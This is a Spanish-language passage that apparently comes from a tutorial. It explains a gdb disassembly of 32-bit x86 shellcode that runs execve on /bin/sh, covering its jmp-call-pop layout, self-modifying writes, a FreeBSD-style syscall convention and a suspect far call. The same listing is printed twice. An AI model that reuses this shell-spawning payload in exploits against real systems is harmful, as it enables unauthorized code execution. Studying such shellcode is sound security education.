Si está interesado y sabe un poco de ensamblador, así es como se ve el shellcode en gdb (x86 de 32 bits, sintaxis Intel):
(gdb) x/s shellcode+61
0x804a07d <shellcode+61>: "2\004\004\004\004\a\004"
(gdb) x/31i shellcode
0x804a040 <shellcode>: jmp 0x804a065 <shellcode+37>
0x804a042 <shellcode+2>: pop esi
0x804a043 <shellcode+3>: lea ebx,[esi]
0x804a045 <shellcode+5>: mov DWORD PTR [esi+0xb],ebx
0x804a048 <shellcode+8>: xor edx,edx
0x804a04a <shellcode+10>: mov DWORD PTR [esi+0x7],edx
0x804a04d <shellcode+13>: mov DWORD PTR [esi+0xf],edx
0x804a050 <shellcode+16>: mov DWORD PTR [esi+0x14],edx
0x804a053 <shellcode+19>: mov BYTE PTR [esi+0x19],dl
0x804a056 <shellcode+22>: xor eax,eax
0x804a058 <shellcode+24>: mov al,0x3b
0x804a05a <shellcode+26>: lea ecx,[esi+0xb]
0x804a05d <shellcode+29>: mov edx,ecx
0x804a05f <shellcode+31>: push edx
0x804a060 <shellcode+32>: push ecx
0x804a061 <shellcode+33>: push ebx
0x804a062 <shellcode+34>: push eax
0x804a063 <shellcode+35>: jmp 0x804a07d <shellcode+61>
0x804a065 <shellcode+37>: call 0x804a042 <shellcode+2>
0x804a06a <shellcode+42>: das
0x804a06b <shellcode+43>: bound ebp,QWORD PTR [ecx+0x6e]
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: jae 0x804a0d9
0x804a071 <shellcode+49>: add DWORD PTR [ecx],eax
0x804a073 <shellcode+51>: add DWORD PTR [ecx],eax
0x804a075 <shellcode+53>: add al,BYTE PTR [edx]
0x804a077 <shellcode+55>: add al,BYTE PTR [edx]
0x804a079 <shellcode+57>: add eax,DWORD PTR [ebx]
0x804a07b <shellcode+59>: add eax,DWORD PTR [ebx]
0x804a07d <shellcode+61>: call 0x407:0x4040404
0x804a084 <shellcode+68>: add BYTE PTR [eax],al
(gdb) x/s shellcode+42
0x804a06a <shellcode+42>: "/bin/sh\001\001\001\001\002\002\002\002\003\003\003\0032\004\004\004\004\a\004"
(gdb) x/31i shellcode
0x804a040 <shellcode>: jmp 0x804a065 <shellcode+37>
0x804a042 <shellcode+2>: pop esi
0x804a043 <shellcode+3>: lea ebx,[esi]
0x804a045 <shellcode+5>: mov DWORD PTR [esi+0xb],ebx
0x804a048 <shellcode+8>: xor edx,edx
0x804a04a <shellcode+10>: mov DWORD PTR [esi+0x7],edx
0x804a04d <shellcode+13>: mov DWORD PTR [esi+0xf],edx
0x804a050 <shellcode+16>: mov DWORD PTR [esi+0x14],edx
0x804a053 <shellcode+19>: mov BYTE PTR [esi+0x19],dl
0x804a056 <shellcode+22>: xor eax,eax
0x804a058 <shellcode+24>: mov al,0x3b
0x804a05a <shellcode+26>: lea ecx,[esi+0xb]
0x804a05d <shellcode+29>: mov edx,ecx
0x804a05f <shellcode+31>: push edx
0x804a060 <shellcode+32>: push ecx
0x804a061 <shellcode+33>: push ebx
0x804a062 <shellcode+34>: push eax
0x804a063 <shellcode+35>: jmp 0x804a07d <shellcode+61>
0x804a065 <shellcode+37>: call 0x804a042 <shellcode+2>
0x804a06a <shellcode+42>: das
0x804a06b <shellcode+43>: bound ebp,QWORD PTR [ecx+0x6e]
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: jae 0x804a0d9
0x804a071 <shellcode+49>: add DWORD PTR [ecx],eax
0x804a073 <shellcode+51>: add DWORD PTR [ecx],eax
0x804a075 <shellcode+53>: add al,BYTE PTR [edx]
0x804a077 <shellcode+55>: add al,BYTE PTR [edx]
0x804a079 <shellcode+57>: add eax,DWORD PTR [ebx]
0x804a07b <shellcode+59>: add eax,DWORD PTR [ebx]
0x804a07d <shellcode+61>: call 0x407:0x4040404
0x804a084 <shellcode+68>: add BYTE PTR [eax],al
(gdb) x/s shellcode+42
0x804a06a <shellcode+42>: "/bin/sh\001\001\001\001\002\002\002\002\003\003\003\0032\004\004\004\004\a\004"
La cadena "/bin/sh" está en shellcode+42; es la ruta que se pasa a execve y que le devuelve una shell (de ahí el nombre "shellcode"). El desensamblado a partir de shellcode+42 parece "código extraño" (das, bound, jae, add...) porque el desensamblador trata esos bytes como instrucciones cuando en realidad son datos: la cadena y los huecos reservados para el terminador nulo y los punteros de argv/envp. Dos detalles que conviene tener en cuenta al leer el listado: (1) las primeras instrucciones tras `pop esi` escriben sobre el propio shellcode (`mov DWORD PTR [esi+0xb],ebx` guarda la dirección de la cadena como argv[0] y los `mov ... ,edx` / `mov ... ,dl` con edx=0 rellenan los bytes nulos), es decir, el código se modifica a sí mismo en tiempo de ejecución y sólo funciona si el búfer donde se inyecta es escribible además de ejecutable (falla bajo W^X/NX); por eso lo que muestra `x/s` puede no coincidir byte a byte con lo que se ensambló originalmente. (2) `mov al,0x3b` carga el número de syscall 59 y los argumentos se pasan apilados (`push edx`, `push ecx`, `push ebx`, `push eax`), lo que parece corresponder a la convención de FreeBSD; en Linux/i386 execve es 0xb y los argumentos van en ebx/ecx/edx, así que este shellcode no es portable entre ambos sistemas sin cambios. Nótese además que la instrucción en shellcode+61, destino del `jmp` en shellcode+35, aparece como `call 0x407:0x4040404` y no como una instrucción de llamada al sistema; probablemente la memoria ya había sido modificada cuando se tomó el volcado, pero conviene verificar esos bytes antes de reutilizar el shellcode.